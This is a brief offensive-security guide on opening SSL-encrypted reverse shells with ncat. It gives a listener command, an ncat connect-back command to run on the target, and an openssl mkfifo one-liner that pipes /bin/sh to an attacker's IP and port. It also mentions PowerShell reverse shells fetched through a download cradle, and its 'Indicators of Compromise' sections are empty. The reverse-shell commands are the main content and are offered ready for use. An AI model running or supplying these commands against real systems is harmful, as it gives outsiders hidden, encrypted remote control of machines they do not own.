Netcat with SSL


This will outline how to use a normal netcat shell except the traffic is encrypted with SSL.


Any operating system that has NMAP support, as the ncat package is shipped with NMAP.


Install NMAP and ensure the ncat command is present


Method 1 - Reverse Shell Listener Linux/Mac

Start up the reverse shell listener with the following command:

ncat --ssl -lvnp <port>

If the target has ncat as well, run the following command on the target:

ncat --ssl <attacker ip> <attcker port>

Otherwise, if they have openssl on linux/mac, use the following command:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | openssl s_client -connect <attacker ip>:<attacker port> 2>&1 > /tmp/f & disown

Indicators of Compromise


Method 2 - Reverse Shell Listener Windows

I highly recommend you use the following command, but if you don't want or need rlwrap, simply omit it from the following command:

rlwrap ncat --ssl -lvnp <port>

If the target has ncat as well, run the following command on the target:

ncat --ssl <attacker ip> <attcker port>

Otherwise, you can use these powershell reverse shells, either "TCPReverseSSL-AddType" or "TCPReverseShell-Reflective" (AddType drops stuff to disk, reflective is less portable and may require tinkering), and then run them through a powershell cradle or otherwise to fetch a reverse shell.

Indicators of Compromise